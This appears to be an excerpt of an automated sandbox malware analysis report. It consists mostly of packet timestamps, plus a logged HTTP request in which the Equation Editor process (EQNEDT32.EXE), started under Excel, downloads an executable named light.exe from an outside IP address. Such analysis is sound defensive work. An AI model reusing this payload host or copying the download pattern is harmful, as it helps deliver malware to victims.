          Nov 20, 2020 19:32:05.915721893 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.036362886 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036393881 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036406994 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036420107 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036437988 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036453962 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036469936 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036485910 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.036525011 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.036559105 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.038165092 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038183928 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038201094 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038216114 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038232088 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038247108 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038255930 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.038264990 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038278103 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.038280964 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.038297892 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.038316011 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.039176941 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040083885 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040102959 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040117979 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040133953 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040143013 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040149927 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040163040 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040167093 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040188074 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040190935 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040205956 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040209055 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040222883 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040225983 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040241003 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040244102 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040257931 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040262938 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040273905 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040281057 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040291071 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040301085 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040306091 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040308952 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040326118 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040328026 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040344000 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040347099 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040360928 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040368080 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040378094 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040385962 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040395021 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040406942 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040410995 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040426016 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040427923 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040445089 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040446043 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040462971 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040466070 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040477991 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040483952 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040498018 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040502071 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040517092 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040518045 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040534973 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040535927 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040553093 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040553093 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040570021 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040570974 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040586948 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040595055 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040604115 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040618896 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040621996 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040637016 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.040648937 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.040668011 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.042340040 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.160748005 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160777092 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160793066 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160809040 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160828114 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160845041 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160861015 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160877943 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.160952091 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.162070036 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.162089109 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.162105083 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.162112951 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.162121058 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.162134886 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.162141085 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.162152052 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.162161112 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.162168026 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.162193060 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.162472963 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.163080931 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.163098097 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.163170099 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.163486004 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164323092 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164345026 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164376020 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164397955 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164597034 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164614916 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164630890 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164637089 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164649010 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164649963 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164664984 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164679050 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164720058 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164736986 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164753914 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164757013 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164769888 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.164772034 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164784908 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164798975 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.164875031 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166266918 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166285992 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166301012 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166316986 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166332960 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166347980 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166363001 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166367054 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166378975 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166384935 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166393042 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166399002 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166409016 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166416883 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166424990 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166434050 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166449070 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166450024 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166462898 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166466951 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166476965 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166482925 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166490078 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166500092 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166515112 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166515112 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166528940 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166536093 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166543961 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166554928 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166568995 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166570902 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166587114 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166589022 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166601896 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166605949 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166618109 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166623116 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.166632891 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.166657925 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285123110 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285155058 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285172939 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285190105 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285202980 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285207033 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285227060 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285228968 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285232067 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285242081 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285247087 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285264969 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.285267115 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285279989 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.285293102 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286195993 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286221981 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286232948 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286241055 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286252975 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286258936 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286267042 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286276102 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286290884 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286293030 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286304951 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286309958 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286319017 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286339998 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286344051 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286365032 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286374092 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286384106 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286395073 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286401033 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286417007 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286418915 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286429882 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286442995 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286561966 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286580086 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286597013 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286607027 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286621094 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286660910 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286662102 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286683083 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286693096 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286700964 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286716938 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286734104 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.286744118 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286748886 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.286760092 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.287405968 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.287424088 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.287441015 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.287457943 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.287468910 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.287487030 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.287491083 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288373947 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288393974 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288410902 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288427114 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288438082 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288444042 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288451910 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288463116 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288466930 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288475990 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288486958 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288499117 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288503885 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288513899 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288522005 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288535118 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288539886 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288548946 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288558960 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288572073 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288585901 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288661003 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288678885 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288695097 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288702965 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288712978 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288718939 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288727045 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288739920 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288757086 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288768053 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288774967 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288793087 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288803101 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288822889 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.288831949 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288846970 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.288858891 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290709019 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290728092 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290745020 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290757895 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290765047 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290785074 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290801048 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290817976 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290834904 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290843964 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290853024 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290854931 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290870905 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290874004 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290884972 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290899038 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290905952 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290925026 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290941000 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290946960 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290960073 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290960073 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290973902 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.290977955 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.290988922 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291014910 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291050911 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291078091 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291089058 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291096926 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291111946 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291116953 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291131973 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291135073 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291148901 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291152954 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291165113 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291171074 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291186094 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291188002 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291207075 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291210890 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291223049 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291224003 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291238070 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291245937 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291258097 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291265011 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291280031 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291281939 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291294098 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291300058 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291316986 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291317940 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291331053 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291336060 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291353941 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291353941 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291368008 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291372061 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291382074 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291392088 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291404009 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291409969 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291424990 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291428089 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291438103 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291446924 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291461945 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291462898 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291476965 CET4916780192.168.2.22192.158.231.122
          Nov 20, 2020 19:32:06.291480064 CET8049167192.158.231.122192.168.2.22
          Nov 20, 2020 19:32:06.291498899 CET8049167192.158.231.122192.168.2.22

          HTTP Request Dependency Graph

          • 192.158.231.122

          HTTP Packets

          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
          0 | 192.168.2.22 | 49167 | 192.158.231.122 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

          Timestamp | kBytes transferred | Direction | Data
          Nov 20, 2020 19:32:05.408795118 CET | 0 | OUT | GET /light.exe HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: 192.158.231.122
          Connection: Keep-Alive
          Nov 20, 2020 19:32:05.534420013 CET | 1 | IN | HTTP/1.1 200 OK
          Content-Type: application/octet-stream
          Last-Modified: Fri, 20 Nov 2020 12:02:01 GMT
          Accept-Ranges: bytes
          ETag: "a0bb98f434bfd61:0"
          Server: Microsoft-IIS/10.0
          Date: Fri, 20 Nov 2020 18:32:05 GMT
          Content-Length: 618496


          Code Manipulations

          Statistics

          CPU Usage

          Memory Usage

          High Level Behavior Distribution

          Behavior

          System Behavior

          General

          Start time:19:31:42
          Start date:20/11/2020
          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          Wow64 process (32bit):false
          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Imagebase:0x13f3f0000
          File size:27641504 bytes
          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:19:32:02
          Start date:20/11/2020
